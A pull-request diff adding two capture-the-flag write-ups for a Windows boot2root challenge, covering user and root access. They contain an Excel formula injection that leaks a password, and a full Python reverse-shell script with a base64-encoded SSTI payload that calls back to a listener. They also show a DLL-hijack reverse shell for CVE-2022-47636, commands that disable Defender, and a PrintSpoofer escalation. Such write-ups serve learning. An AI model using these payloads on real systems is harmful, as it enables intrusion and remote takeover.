Merge pull request #115 from tweey/main

Better late than never?

writeups/boot2root/Excellent (root)/Iku-toppene/README.md

@@ -0,0 +1,63 @@
+# 🔥 Excellent (root) 🔥
+
+`Tweey` @ Iku-toppene
+
+## Summary
+
+As Charles, I find a a .oml file, which I will use to perform a dll hijack to get reverse shell and pivot to the Bill user. As Bill, I have the SeImpersonatePrivilege which I will abuse in order to escalate the privileges to nt authority\system
+
+## Shell as Charles
+In the /Desktop there is a file TODO.txt which says the following
+
+```
+Lunch with Brian Lester
+Plan mission to the moon
+Fix Project for Money (he checks it like every minute...)
+Disable windows autologin for security reasons
+```
+He mentions some sort of Project that he works on, and that someone checks this every minute. From further manual enumeration I find a file called Project.oml in `\shared`.
+
+### CVE-2022-47636
+Searching for exploits in .oml files shows a dll hijack exploit identified in 2022\
+![Google results from cve2022-47636](./assets/cve2022-47636.png)\
+From reading about the exploit on [exploitdb](https://www.exploit-db.com/exploits/51678), it seems fairly trivial to exploit
+```
+A DLL hijacking vulnerability has been discovered in OutSystems Service 
+Studio 11 11.53.30 build 61739.
+When a user open a .oml file (OutSystems Modeling Language), the 
+application will load the following DLLs from the same directory:
+
+av_libGLESv2.dll
+libcef.DLL
+user32.dll
+d3d10warp.dll
+
+Using a crafted DLL, it is possible to execute arbitrary code in the 
+context of the current logged in user.
+```
+It is possible to run arbitrary dll files, such as a [reverse shell](https://raw.githubusercontent.com/Hood3dRob1n/Y.A.S.P./refs/heads/master/payloads/reverse-dll/reverse_dll.c). 
+With the local ip and port added to the payload and netcat listener running, I compile the payload locally using mingw-w64 and transfer the file to the target machine
+```
+x86_64-w64-mingw32-gcc reverse_dll.c -shared -lws2_32 -o user32.dll
+```
+![Uploaded user32 to target](./assets/user32.png)\
+Since I was not sure if all of the DLLs were loaded by project.oml, I also copied the file to the other DLLs listed in the exploit details on [exploitdb](https://www.exploit-db.com/exploits/51678).
+```
+Copy-Item "user32.dll" -Destination 'av_libGLESv2.dll'
+Copy-Item "user32.dll" -Destination 'libcef.dll'
+Copy-Item "user32.dll" -Destination 'd3d10warp.dll'
+```
+
+## Shell as Bill
+Seeing the privileges of the Bill User, I notice that I have access to several privileges.
+![privleges](./assets/privleges.png)
+To make the privlege escalation easier, I begin by turning the anti virus off. 
+```
+Set-MpPreference -DisableRealtimeMonitoring $true
+Set-MpPreference -DisableIOAVProtection $true
+```
+I also notice the `SeImpersonatePrivilege` is enabled, which allows impersonation of any token. There are multiple payloads we can use in order to exploit it such as juicy-potato, SweetPotato and PrintSpoofer. I will use [PrintSpooler](https://github.com/dievus/printspoofer) to exploit it.
+After transferring the PrintSpooler.exe to the target machine (I did it using python http server as previously shown), I can run the payload and start cmd as `nt authorith\system`
+![system](./assets/system.png)
+
+**Flag: EPT{4nd_th4T_Wa5_3vEn_BETTER!}**

writeups/boot2root/Excellent (user)/Iku-toppene/README.md

@@ -0,0 +1,57 @@
+# 🔥 Excellent (user) 🔥
+
+`Tweey` @ Iku-toppene\
+Disclaimer: This challenge was originally solved by Shirajuki in my team, but this writeup is written from my perspective.
+## Summary
+This challenge involved leveraging an Excel-based database for credential extraction. After gaining access as Administrator, a server-side template injection (SSTI) vulnerability was exploited to obtain reverse shell.
+## Access to Administrator
+The first step in this challenge is to determine the server’s backend, which appeared to use Excel. By sending the input `" , "`, an Excel error message is returned, confirming the use of Excel as the database.\
+![Error](./assets/error.png)\
+With Excel confirmed as the backend, it is possible to retrieve the Admin password using an Excel formula. By setting the name field to =$C1, which references the C1 column, the password of the Administrator user is revealed.\
+![c1](./assets/c1.png)\
+The password is revealed after logging in as the user.\
+![username](./assets/username.png)\
+It is now possible to log in as the Admin user.\
+![admin](./assets/admin.png)
+## Reverse shell in SSTI
+After logging in as Admin, is is possible to access the /report page. An SSTI vulnerability is identified by entering the payload `{{7*7}}` as the name while registerring a user.\
+![ssti](./assets/ssti.png)\
+During the competition, we first attempted to use PowerShell for a reverse shell, but these attempts were caught by Defender AntiVirus. However, switching to Python is simpler. The following payload is used for reverse shell
+```
+import os,socket,subprocess,threading;
+def s2p(s, p):
+    while True:
+        data = s.recv(1024)
+        if len(data) > 0:
+            p.stdin.write(data)
+            p.stdin.flush()
+
+def p2s(s, p):
+    while True:
+        s.send(p.stdout.read(1))
+
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+s.connect(("INSERT IP",PORT))
+
+p=subprocess.Popen(["powershell"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
+
+s2p_thread = threading.Thread(target=s2p, args=[s, p])
+s2p_thread.daemon = True
+s2p_thread.start()
+
+p2s_thread = threading.Thread(target=p2s, args=[s, p])
+p2s_thread.daemon = True
+p2s_thread.start()
+
+try:
+    p.wait()
+except KeyboardInterrupt:
+    s.close()
+```
+To execute this payload via SSTI, the script is base64-encoded and embedded into the following payload:
+```
+{{dict.__base__.__subclasses__()[544](["python", "-c", "import base64;exec(base64.b64decode('aW1wb3J0IG9zLHNvY2tldCxzdWJwcm9jZXNzLHRocmVhZGluZzsKZGVmIHMycChzLCBwKToKICAgIHdoaWxlIFRydWU6CiAgICAgICAgZGF0YSA9IHMucmVjdigxMDI0KQogICAgICAgIGlmIGxlbihkYXRhKSA+IDA6CiAgICAgICAgICAgIHAuc3RkaW4ud3JpdGUoZGF0YSkKICAgICAgICAgICAgcC5zdGRpbi5mbHVzaCgpCgpkZWYgcDJzKHMsIHApOgogICAgd2hpbGUgVHJ1ZToKICAgICAgICBzLnNlbmQocC5zdGRvdXQucmVhZCgxKSkKCnM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pCnMuY29ubmVjdCgoIjEwLjEyOC4yLjI1IiwxMzM3KSkKCnA9c3VicHJvY2Vzcy5Qb3BlbihbInBvd2Vyc2hlbGwiXSwgc3Rkb3V0PXN1YnByb2Nlc3MuUElQRSwgc3RkZXJyPXN1YnByb2Nlc3MuU1RET1VULCBzdGRpbj1zdWJwcm9jZXNzLlBJUEUpCgpzMnBfdGhyZWFkID0gdGhyZWFkaW5nLlRocmVhZCh0YXJnZXQ9czJwLCBhcmdzPVtzLCBwXSkKczJwX3RocmVhZC5kYWVtb24gPSBUcnVlCnMycF90aHJlYWQuc3RhcnQoKQoKcDJzX3RocmVhZCA9IHRocmVhZGluZy5UaHJlYWQodGFyZ2V0PXAycywgYXJncz1bcywgcF0pCnAyc190aHJlYWQuZGFlbW9uID0gVHJ1ZQpwMnNfdGhyZWFkLnN0YXJ0KCkKCnRyeToKICAgIHAud2FpdCgpCmV4Y2VwdCBLZXlib2FyZEludGVycnVwdDoKICAgIHMuY2xvc2UoKQ=='.encode()).decode())"], stdout=-1).communicate()[0]}}
+```
+After setting up a netcat listener on the eptbox and refreshing the /report page, we have shell as the user Charles.\
+![charles](./assets/charles.png)\
+**Flag: EPT{N0w_tha7_wa5_EXCELLENT!}**